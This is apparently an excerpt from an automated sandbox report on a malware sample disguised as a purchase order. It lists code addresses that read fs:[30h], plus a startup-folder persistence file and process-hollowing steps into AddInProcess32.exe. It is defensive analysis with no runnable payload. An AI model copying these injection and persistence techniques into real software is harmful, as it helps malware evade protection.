                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154648A mov eax, dword ptr fs:[00000030h]18_2_0154648A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154648A mov eax, dword ptr fs:[00000030h]18_2_0154648A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A84BB mov eax, dword ptr fs:[00000030h]18_2_015A84BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E4BC mov eax, dword ptr fs:[00000030h]18_2_0154E4BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015124A2 mov eax, dword ptr fs:[00000030h]18_2_015124A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015124A2 mov ecx, dword ptr fs:[00000030h]18_2_015124A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015444A8 mov eax, dword ptr fs:[00000030h]18_2_015444A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A750 mov eax, dword ptr fs:[00000030h]18_2_0154A750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532755 mov eax, dword ptr fs:[00000030h]18_2_01532755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532755 mov eax, dword ptr fs:[00000030h]18_2_01532755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532755 mov eax, dword ptr fs:[00000030h]18_2_01532755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532755 mov ecx, dword ptr fs:[00000030h]18_2_01532755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532755 mov eax, dword ptr fs:[00000030h]18_2_01532755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532755 mov eax, dword ptr fs:[00000030h]18_2_01532755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BE750 mov eax, dword ptr fs:[00000030h]18_2_015BE750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01540774 mov eax, dword ptr fs:[00000030h]18_2_01540774
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01514779 mov eax, dword ptr fs:[00000030h]18_2_01514779
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01514779 mov eax, dword ptr fs:[00000030h]18_2_01514779
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01522760 mov ecx, dword ptr fs:[00000030h]18_2_01522760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151471B mov eax, dword ptr fs:[00000030h]18_2_0151471B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151471B mov eax, dword ptr fs:[00000030h]18_2_0151471B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153270D mov eax, dword ptr fs:[00000030h]18_2_0153270D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153270D mov eax, dword ptr fs:[00000030h]18_2_0153270D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153270D mov eax, dword ptr fs:[00000030h]18_2_0153270D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E7E0 mov eax, dword ptr fs:[00000030h]18_2_0153E7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E79D mov eax, dword ptr fs:[00000030h]18_2_0158E79D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015AC7B0 mov eax, dword ptr fs:[00000030h]18_2_015AC7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015AC7B0 mov eax, dword ptr fs:[00000030h]18_2_015AC7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov eax, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov eax, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov eax, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov eax, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov eax, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov eax, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B47B4 mov ecx, dword ptr fs:[00000030h]18_2_015B47B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015107A7 mov eax, dword ptr fs:[00000030h]18_2_015107A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154265C mov eax, dword ptr fs:[00000030h]18_2_0154265C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154265C mov ecx, dword ptr fs:[00000030h]18_2_0154265C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154265C mov eax, dword ptr fs:[00000030h]18_2_0154265C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154C640 mov eax, dword ptr fs:[00000030h]18_2_0154C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154C640 mov eax, dword ptr fs:[00000030h]18_2_0154C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01510670 mov eax, dword ptr fs:[00000030h]18_2_01510670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552670 mov eax, dword ptr fs:[00000030h]18_2_01552670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552670 mov eax, dword ptr fs:[00000030h]18_2_01552670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154666D mov esi, dword ptr fs:[00000030h]18_2_0154666D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154666D mov eax, dword ptr fs:[00000030h]18_2_0154666D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154666D mov eax, dword ptr fs:[00000030h]18_2_0154666D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159E660 mov eax, dword ptr fs:[00000030h]18_2_0159E660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4600 mov eax, dword ptr fs:[00000030h]18_2_015E4600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01510630 mov eax, dword ptr fs:[00000030h]18_2_01510630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01540630 mov eax, dword ptr fs:[00000030h]18_2_01540630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01598633 mov esi, dword ptr fs:[00000030h]18_2_01598633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01598633 mov eax, dword ptr fs:[00000030h]18_2_01598633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01598633 mov eax, dword ptr fs:[00000030h]18_2_01598633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154C620 mov eax, dword ptr fs:[00000030h]18_2_0154C620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A66D0 mov eax, dword ptr fs:[00000030h]18_2_015A66D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A66D0 mov eax, dword ptr fs:[00000030h]18_2_015A66D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B86C2 mov eax, dword ptr fs:[00000030h]18_2_015B86C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DA6C0 mov eax, dword ptr fs:[00000030h]18_2_015DA6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015106CF mov eax, dword ptr fs:[00000030h]18_2_015106CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158C6F2 mov eax, dword ptr fs:[00000030h]18_2_0158C6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158C6F2 mov eax, dword ptr fs:[00000030h]18_2_0158C6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151C6E0 mov eax, dword ptr fs:[00000030h]18_2_0151C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015366E0 mov eax, dword ptr fs:[00000030h]18_2_015366E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015366E0 mov eax, dword ptr fs:[00000030h]18_2_015366E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01518690 mov eax, dword ptr fs:[00000030h]18_2_01518690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159C691 mov eax, dword ptr fs:[00000030h]18_2_0159C691
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520680 mov eax, dword ptr fs:[00000030h]18_2_01520680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01520680 mov eax, dword ptr fs:[00000030h] (11 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015D86A8 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01534955 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154C958 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154C944 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153E94E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01516970 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0152096B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01566912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01542919 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0156693A mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015D892E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015E492D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0158C920 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0158C920 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015E29CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015189C0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015109F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015449F0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154C98F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B0980 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015489B0 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015A69B0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015A69B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151E9A0 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015989A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0159C870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154C819 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015088C8 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015108CD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015A88FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015448F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015C8890 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01536882 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0159488F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0155088E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0155088E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01516B70 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015C6B77 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01544B79 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015E4B67 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01518B10 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01520B10 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150CB1E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153EB1C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154CB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0159CB20 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01538BD1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B6BDE mov ebx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B6BDE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150EBC0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01594BC0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015E4BE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015D8BBE mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01594A57 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153EA40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015AAA40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154AA0E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B4AC2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01520ACE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01590AFF mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015E4AE8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01530AEB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B0AE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B2AE0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01510AED mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015C6A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015E4D4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0158CD40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015B6D79 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153CD10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153CD10 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015A8D0A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01530D01 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0159CD00 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0153AD20 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015C0D24 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015CADD6 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01508DCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150EDFA mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015DCDEB mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01516D91 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150CD8A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01542DBC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\sages.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\PO# 81136575.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtMapViewOfSection: Direct from: 0x44B1F57
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x44B9AE9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFAC53E2651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | NtResumeThread: Indirect: 0x5663B89
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x44B2095
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | NtQueueApcThread: Indirect: 0x565F3C5
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x44B1E51
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x44B2023
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtMapViewOfSection: Direct from: 0x44B1F9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | NtClose: Indirect: 0x565F453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | NtSetContextThread: Indirect: 0x5663549
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | NtSuspendThread: Indirect: 0x5663869
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Memory written: unknown base: 400000 value starts with: 4D5A
